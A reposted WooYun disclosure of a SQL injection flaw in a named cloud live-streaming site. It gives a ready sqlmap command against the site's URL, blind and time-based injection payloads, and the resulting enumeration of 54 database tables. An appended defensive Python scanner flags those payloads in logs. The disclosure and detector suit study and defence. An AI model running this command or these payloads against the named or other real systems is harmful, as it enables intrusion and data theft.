神刀安全网

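Vulnerability title: SQL injection vulnerability in a cloud video live-streaming platform

Vulnerability details

Disclosure status:

2016-04-06: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-05-21: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The core team all come from well-known internet companies such as Tencent, with rich experience and many achievements in internet product planning, cloud platform construction and streaming media technology. They hold an absolute advantage and foresight in solving domestic live video technology problems, and are regarded by the industry as the interactive live-video service with the greatest development potential.

A cloud video live-streaming platform has a SQL injection vulnerability.

Detailed description:

Code area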
python sqlmap.py -u "http://www.jingchang.tv/index.php?s=/Home/Index/new_show/id/21" --tables -D "cloud"

Proof of vulnerability:

Code area
sqlmap identified the following injection point(s) with a total of 102 HTTP(s) requests:
---
Parameter: s (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: s=/Home/Index/new_show/id/21) AND 8951=8951 AND (1886=1886

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: s=/Home/Index/new_show/id/21) AND (SELECT * FROM (SELECT(SLEEP(5)))XNqn) AND (3272=3272
---
back-end DBMS: MySQL 5.0.12
current database: 'cloud'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: s=/Home/Index/new_show/id/21) AND 8951=8951 AND (1886=1886

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: s=/Home/Index/new_show/id/21) AND (SELECT * FROM (SELECT(SLEEP(5)))XNqn) AND (3272=3272
---
back-end DBMS: MySQL >= 5.0.0
current user: '[email protected]'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: s=/Home/Index/new_show/id/21) AND 8951=8951 AND (1886=1886

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: s=/Home/Index/new_show/id/21) AND (SELECT * FROM (SELECT(SLEEP(5)))XNqn) AND (3272=3272
---
back-end DBMS: MySQL 5
Database: cloud
[54 tables]
+-----------------------+
| jck_action |
| jck_action_log |
| jck_addons |
| jck_api_group |
| jck_api_record |
| jck_apidoc_log |
| jck_apidoc_main |
| jck_apidoc_params |
| jck_apidoc_return |
| jck_attachment |
| jck_attribute |
| jck_auth_extend |
| jck_auth_group |
| jck_auth_group_access |
| jck_auth_rule |
| jck_camera_category |
| jck_camera_channel |
| jck_camera_group |
| jck_camera_main |
| jck_camera_session |
| jck_camera_type |
| jck_category |
| jck_channel |
| jck_company_banner |
| jck_company_category |
| jck_company_document |
| jck_company_menu |
| jck_config |
| jck_device_camera |
| jck_device_main |
| jck_document |
| jck_document_article |
| jck_document_download |
| jck_file |
| jck_general_count |
| jck_general_nations |
| jck_general_provinces |
| jck_hooks |
| jck_menu |
| jck_model |
| jck_picture |
| jck_social_action |
| jck_social_discuz |
| jck_social_friends |
| jck_social_related |
| jck_store_auth |
| jck_ucenter_admin |
| jck_ucenter_app |
| jck_ucenter_member |
| jck_ucenter_setting |
| jck_url |
| jck_user_article |
| jck_user_main |
| jck_userdata |
+-----------------------+

sqlmap resumed the following injection point(s) from stored session:

Fix:
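
Added example, not part of the original report: both payloads in the sqlmap output ride in the `id` segment of the `s` routing parameter, so a log review can flag any request whose `id` segment is not a plain integer. The sketch assumes the `/Module/Controller/action/key/value` layout suggested by the URL in the report; the function names and the sample request targets are constructed for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

INT_RE = re.compile(r"[0-9]{1,10}")  # what a numeric id should look like
INT_PARAMS = {"id"}                  # assumption: route parameters expected to be integers

# Constructed request targets: one normal request and the two payloads shown
# in the sqlmap output above, percent-encoded as they would appear in a log.
SAMPLE_TARGETS = [
    "/index.php?s=/Home/Index/new_show/id/21",
    "/index.php?s=/Home/Index/new_show/id/21)%20AND%208951=8951%20AND%20(1886=1886",
    "/index.php?s=/Home/Index/new_show/id/21)%20AND%20(SELECT%20*%20FROM%20"
    "(SELECT(SLEEP(5)))XNqn)%20AND%20(3272=3272",
    "/static/logo.png",
]

def parse_route(target):
    """Return (route, params) for a target carrying the `s` routing
    parameter, or None if the parameter is absent."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "s" not in query:
        return None
    segments = [seg for seg in query["s"][0].split("/") if seg]
    route, rest = "/".join(segments[:3]), segments[3:]
    if len(rest) % 2:          # dangling key with no value
        rest.append("")
    return route, dict(zip(rest[0::2], rest[1::2]))

def findings(target):
    """List (route, name, value) for integer parameters holding non-integers."""
    parsed = parse_route(target)
    if parsed is None:
        return []
    route, params = parsed
    return [(route, name, value) for name, value in params.items()
            if name in INT_PARAMS and not INT_RE.fullmatch(value)]

def scan(targets):
    """Map each suspicious target to its findings."""
    return {t: f for t in targets if (f := findings(t))}

if __name__ == "__main__":
    for target, hits in scan(SAMPLE_TARGETS).items():
        for route, name, value in hits:
            print(f"{route}: {name}={value!r}")
```

The same integer check, enforced server-side before the value is used in a query, rejects both payload shapes shown in the proof.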

Copyright notice: when reposting, please credit the source 绿箭侠@乌云 (WooYun)
